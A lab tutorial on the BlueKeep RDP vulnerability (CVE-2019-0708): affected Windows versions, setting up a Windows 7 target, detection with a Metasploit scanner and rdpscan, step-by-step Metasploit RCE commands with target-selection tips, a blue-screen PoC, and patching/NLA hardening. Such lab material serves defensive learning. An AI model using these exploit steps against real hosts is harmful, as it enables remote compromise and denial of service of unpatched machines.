Vulnerability description
A remote code execution vulnerability exists in Remote Desktop Services (formerly Terminal Services). It is tracked as CVE-2019-0708, is commonly called BlueKeep, and is titled "Remote Desktop Services Remote Code Execution Vulnerability" in the Microsoft advisory. An unauthenticated attacker who connects to the target over RDP and sends a specially crafted request can trigger it. The flaw is a use-after-free in the kernel RDP driver (termdd.sys) that is reached by binding the internal MS_T120 virtual channel during connection setup, before any authentication and without user interaction, which is what makes it wormable.
Affected versions
- Windows XP SP3 x86
- Windows XP Professional x64 Edition SP2
- Windows XP Embedded SP3 x86
- Windows Server 2003 SP2 x86
- Windows Server 2003 x64 Edition SP2
- Windows Server 2003 R2 SP2
- Windows Server 2003 R2 x64 Edition SP2
- Windows Vista SP2
- Windows Vista x64 Edition SP2
- Windows 7
Windows Server 2008 and Windows Server 2008 R2 are also affected according to the Microsoft advisory; Windows 8 and later are not.
Setting up the lab environment
Thunder (Xunlei) download of the target image:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
When installing the virtual machine, choose the Professional (or Ultimate) edition rather than the default Home edition: Home editions cannot accept Remote Desktop connections.
After installation, enable Remote Desktop on the target (System Properties > Remote) so that TCP port 3389 is listening.
Vulnerability detection
Kali (Metasploit)
Start msf:
msfconsole
Search for the BlueKeep detection module:
search 2019_0708
Load the scanner module, set the IP to be checked, and run it:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run
The message The target is vulnerable
means the vulnerability is present. The scanner is non-destructive (it binds the MS_T120 channel and watches how the server cleans it up), but it must complete the unauthenticated channel setup to decide, so a host that enforces NLA cannot be confirmed as vulnerable or as patched by this check.
To scan several hosts at once, give rhosts a range:
set rhosts 192.168.234.128-133
Detection tool on Windows
Tool download address: https://github.com/k8gege/CVE-2019-0708
Usage:
# batch scan of a range
rdpscan.exe 192.168.234.1-192.168.234.254
# scan a single host
rdpscan.exe 192.168.234.129
A result line containing VULNERABLE - CVE-2019-0708
means the host is vulnerable.
Exploit
The exploit has significant restrictions: the public RCE module below only supports 64-bit Windows 7 SP1 / Server 2008 R2, and each of its targets is tied to the hypervisor the victim runs on.
Remote code execution
Attack machine: Kali
Target machine: Windows 7
# start msf
msfconsole
# search for the 2019-0708 modules
search 2019-0708
# select the exploit module
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# set the target IP
set rhosts 192.168.234.132
# choose the target definition (depends on the victim's platform)
set target 1
# launch the attack
run
If set target 1
does not work, try the other target definitions: show targets
lists them, and you pick the one matching the victim's platform. The targets differ because the exploit's heap grooming relies on a fixed non-paged pool base (the module's GROOMBASE option) that varies between VirtualBox, VMware versions, Hyper-V and bare metal; choosing the wrong one usually blue-screens the target instead of returning a shell, so fingerprint the victim's virtualization platform before running it.
Blue screen (denial of service)
Tool:
https://github.com/CVE-2019-0708/CVE-2019-0708
Usage:
# python PoC.py <ip>
python PoC.py 192.168.234.129
This can blue-screen Windows XP, XP Embedded, Windows 7, Server 2003 and Server 2008. The PoC triggers the termdd.sys bug without a controlled write, so the kernel bugchecks and the host reboots; against anything other than a lab machine this is simply a denial of service.
Vulnerability hardening
- Install the official Microsoft patch. The guidance page https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 links the update for each affected version, including the out-of-support Windows XP and Server 2003 builds.
- Where patching is delayed, enable Network Level Authentication (NLA) on the host: it demands credentials before the vulnerable channel setup is reached. This is only a partial mitigation, since an attacker with valid credentials can still trigger the bug.
- Block TCP port 3389 at the firewall or network edge, and disable Remote Desktop on systems that do not need it.
- Security software such as 360 or Huorong may detect scanning and exploitation attempts, but it is not a substitute for the patch.